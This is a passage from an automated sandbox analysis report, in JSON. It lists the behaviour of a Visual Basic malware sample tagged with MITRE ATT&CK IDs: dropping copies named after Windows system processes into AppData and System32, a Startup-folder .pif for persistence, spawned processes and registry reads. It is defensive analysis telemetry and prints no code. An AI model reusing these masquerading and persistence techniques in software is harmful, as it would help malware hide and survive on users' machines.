api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003388)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003388)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005404)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005412)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005436)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005620)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005156)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005324)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005244)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005628)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005348)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005364)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005916)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005808)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005284)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000908)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005432)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005232)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003448)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002104)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004752)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005636)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001456)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005520)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001288)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006012)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005836)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005404)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005412)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005436)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005620)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005156)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005324)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005244)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005628)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005348)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005364)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005916)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005808)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005284)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000908)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005432)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005232)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003448)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002104)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004752)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005636)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001456)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005520)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001288)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006012)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005836)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00005404) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00005404) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4669.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4669.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4994.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4994.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4992.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4992.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4667.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4667.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"services.exe\" - Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005136]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"lsass.exe\" - Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005136]\n Dropped file: \"IExplorer.exe\" - Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00005628]\n Dropped file: \"winlogon.exe\" - Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005136]\n Dropped file: \"smss.exe\" - Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005136]\n Dropped file: \"D3_08.exe\" - Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00005628]\n Dropped file: \"csrss.exe\" - Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005136]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00005628]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005628]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe.cfg\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\CRYPTSP.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTSP.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to touch file \"C:\\Windows\\system32\\rsaenh.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe.cfg\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe.Local\\\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\share\\d3_08\\new folder.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\winlogon.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\d3_08.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" reads file \"c:\\users\\desktop.ini\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" reads file \"c:\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"OPEN\"; Path: 